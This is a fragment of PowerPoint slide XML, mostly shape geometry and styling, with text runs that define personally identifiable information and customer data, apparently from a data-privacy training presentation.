                  <a:pt x="11851345" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11832132" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11802831" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11765666" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11722862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881376" y="4164838"/>
            <a:ext cx="11365865" cy="6356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 spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Personally</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Identifiable</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(PII):</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Refers</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>identify,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>contact,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>locate </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-6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dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>individual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819910" y="4038853"/>
            <a:ext cx="939800" cy="939800"/>
            <a:chOff x="1819910" y="4038853"/>
            <a:chExt cx="939800" cy="939800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1832610" y="4051553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200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="236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832610" y="4051553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0" y="457200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0075C4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19300" y="4238243"/>
              <a:ext cx="539495" cy="539496"/>
            </a:xfrm>
            <a:prstGeom prst="rect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2764535" y="5670803"/>
            <a:ext cx="11856720" cy="814069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11856719" h="814070">
                <a:moveTo>
                  <a:pt x="11721083" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="806903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135636" y="813816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11721083" y="813816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11763963" y="806903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11801197" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11830555" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11849807" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11856719" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11856719" y="135636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11849807" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11830555" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11801197" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11763963" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11721083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882900" y="5899784"/>
            <a:ext cx="1132014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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Customer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>institutional</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>personal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>customer’s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>employees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818385" y="5613146"/>
            <a:ext cx="939800" cy="939800"/>
            <a:chOff x="1818385" y="5613146"/>
            <a:chExt cx="939800" cy="939800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1831085" y="5625846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200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="236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831085" y="5625846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0" y="457199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
